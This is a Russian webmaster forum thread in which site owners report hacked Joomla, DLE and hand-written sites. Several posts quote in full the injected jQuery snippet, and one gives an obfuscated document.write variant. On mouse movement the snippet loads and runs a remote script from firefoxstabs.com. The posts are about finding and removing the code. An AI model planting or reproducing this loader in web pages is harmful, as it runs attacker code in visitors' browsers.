- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сегодня с утра проверяла сайты, один из них вместо привычной картинки главной страницы выдает ошибку в какой-то там строке index.php.
Пошла проверять, там нашлась такая штука:
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>
Причем это же прописано абсолютно во всех файлах index.html и нескольких рабочих файлах. Из рабочих поудаляла, сайт заработал.
Кто-нибудь знает, что это такое?
Ну взломали да и внедрили JS скрипт вредоносный, делов то.
Сегодня с утра проверяла сайты, один из них вместо привычной картинки главной страницы выдает ошибку в какой-то там строке index.php.
Пошла проверять, там нашлась такая штука:
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>
Причем это же прописано абсолютно во всех файлах index.html и нескольких рабочих файлах. Из рабочих поудаляла, сайт заработал.
Кто-нибудь знает, что это такое?
Сегодня в 03.06 тоже подвергся такой хренью. Были заражены .html, .php, .js, а так же файлы шаблона .tpl (у меня DLE) Гугл особо ничего не дал. Единственное, где узнал о том что firefoxstabs.com атакует - это блог http://saintist.ru/2011/04/21/firefoxstabs-com-zarazhaet-sajty/, да и то там информация скудная.
Скачал все свои сайты, проверил антивирем. Результат ничего не дал. Пришлось все файлы проверять в ручную и удалять вредоносный скрипт.
Не поленился и пробил все сайты на одном IP, находящихся у хостера. Сайты были и CMS и самописы. Зараженные сайты, как доказательство предоставил хостеру Агава. Ожидал от них помощи, ну или хотябы совета. В ответ прислали инструкцию как правильно выставить права на запись, где и в каких папках хранить файлы и новый пароль на FTP. Одним словом, инструкция.
Вот теперь и не знаю: на долго ли? Да и вообще хотелось бы узнать мнение форумчан по данному скрипту: кто и как лечился?
/ru/forum/comment/8948605
тут скрипт быстрой чистки
Logik7, что-то нет доверия к вашему скрипту.
столкнулся с такой же проблемой. Движок Joomla. Как что и откуда появилось непонятно.
Вот и у меня сайт на джумле, ручную чистить все файлы - убить уйму времени. Нашла скрипт антивируса, кому надо в личку скину. С ним дело пошло веселее, но кое что все равно дочищала. Потом посмотрела остальные сайты на этом же хостинге - ещё 3 оказались зараженными.
Поменяла пароль на фтп, надеюсь, больше не подхвачу эту заразу.
Шоб у того, кто пакостит так, все сайты и компы со всей инфой разом накрылись😡
У меня точно такая же ситуация!
Полетели три сайта хостинг "Рег.ру" что самое интересное на одном FTP лежат четыре сайта три на Джумле один самописный двиг. полетели те которые на джумле. Почистил код сменил пароли все равно зараза осталась.
Добрый день!
Если думаете, что Вас взломали, можем провести аудит исходных кодов сайта и/или сервера.
Пиши, поможем.
аналогично, если надо могу посмотреть за вознаграждение (ЛС)
P.S. у меня все сайтики на самописных движках. За последние 4 года был 1 фрейм в index и то ломанули хостера а не меня )))
пишите код руками и сайты не будут ломать вагонами
Проблему удалось решить путем удаления вредоносного кода, и удаления вируса с компьютера который и получил доступ к FTP. Скопировал содержимое корневого каталога на комп, через Dreamweaver нашел файлы содержащие код, удалил. Залил на хостинг, вирус все равно остался. Посмотрел внимательно оказалось в файлах с расширением .js код в немного видоизменен, в отличии от файлов с расширением php и тд. после поиска с новыми параметрами удалил, сменил пароль FTP и все заработало отлично!
вот фрагмент который в ява скриптах:
document.write('<scr'+'ipt src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});
sl-krm, результат такой зачистки мы узнаем через пару месяцев :)
Слабо верится, что они исчезли навсегда.